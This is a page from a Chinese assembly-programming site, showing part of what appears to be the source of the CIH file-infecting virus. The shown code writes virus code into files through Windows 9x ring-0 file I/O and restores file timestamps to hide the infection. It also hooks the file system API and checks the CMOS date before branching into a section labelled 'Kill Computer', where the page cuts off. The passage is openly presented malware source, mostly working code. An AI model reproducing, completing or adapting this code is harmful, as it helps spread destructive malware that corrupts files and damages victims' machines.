; * to File, I Must Restore *
; * them First. ^__^ *
; ***************************
lea eax, (LastVxDCallAddress-2-@9)[esi]
mov cl, VxDCallTableSize
LoopOfRestoreVxDCallID:
mov word ptr [eax], 20cdh
逆风编程技术
mov edx, (VxDCallIDTable (ecx-1)*04h-@9)[esi]
mov [eax 2], edx
movzx edx, byte ptr (VxDCallAddressTable ecx-1-@9)[esi]
sub eax, edx
loop LoopOfRestoreVxDCallID
; ***************************
; * Let's Write *
; * Virus Code to the File *
; ***************************
WriteVirusCodeToFile:
mov eax, dr1
mov ebx, [eax 10h]
mov edi, [eax]
LoopOfWriteVirusCodeToFile:
pop ecx
jecxz SetFileModificationMark
mov esi, ecx
mov eax, 0d601h
pop edx
pop ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO
jmp LoopOfWriteVirusCodeToFile
; ***************************
; * Let's Set CF = 1 ==> *
; * Need to Restore File *
; * Modification Time *
; ***************************
SetFileModificationMark:
pop ebx
pop eax
stc ; Enable CF(Carry Flag)
pushf
; *************************************
; * Close File *
; *************************************
CloseFile:
xor eax, eax
mov ah, 0d7h
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Need to Restore File Modification *
; * Time !? *
; *************************************
popf
pop esi
jnc IsKillComputer
; *************************************
; * Restore File Modification Time *
; *************************************
mov ebx, edi
mov ax, 4303h
mov ecx, (FileModificationTime-@7)[esi]
mov edi, (FileModificationTime 2-@7)[esi]
call ebx ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Disable OnBusy *
; *************************************
DisableOnBusy:
dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy
; *************************************
; * Call Previous FileSystemApiHook *
; *************************************
prevhook:
popad
mov eax, dr0 ;
jmp [eax] ; Jump to prevhook
; *************************************
; * Call the Function that the IFS *
; * Manager Would Normally Call to *
; * Implement this Particular I/O *
; * Request. *
; *************************************
pIFSFunc:
mov ebx, esp
push dword ptr [ebx 20h 04h 14h] ; Push pioreq
call [ebx 20h 04h] ; Call pIFSFunc
pop ecx ;
mov [ebx 1ch], eax ; Modify EAX Value in Stack
; ***************************
; * After Calling pIFSFunc, *
; * Get Some Data from the *
; * Returned pioreq. *
; ***************************
cmp dword ptr [ebx 20h 04h 04h], 00000024h
jne QuitMyVirusFileSystemHook
; *****************
; * Get the File *
; * Modification *
; * Date and Time *
; * in DOS Format.*
; *****************
mov eax, [ecx 28h]
mov (FileModificationTime-@6)[esi], eax
; ***************************
; * Quit My Virus' *
; * IFSMgr_FileSystemHook *
; ***************************
QuitMyVirusFileSystemHook:
popad
ret
; *************************************
; * Kill Computer !? ... *^_^* *
; *************************************
IsKillComputer:
; Get Now Day from BIOS CMOS
mov al, 07h
out 70h, al
in al, 71h
xor al, 01h ; ??/26/????
IF DEBUG
jmp DisableOnBusy
ELSE
jnz DisableOnBusy
ENDIF
; **************************************
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
本文章更多内容:<<上一页 - 1 - 2 - 3 - 4 - 5 - 6 - 7 - 8 - 9 - 10 - 11 - 12 - 下一页>> |
您的位置:逆风者
→ 汇编技术
→ 正文
本文章所属分类:首页
→ 汇编技术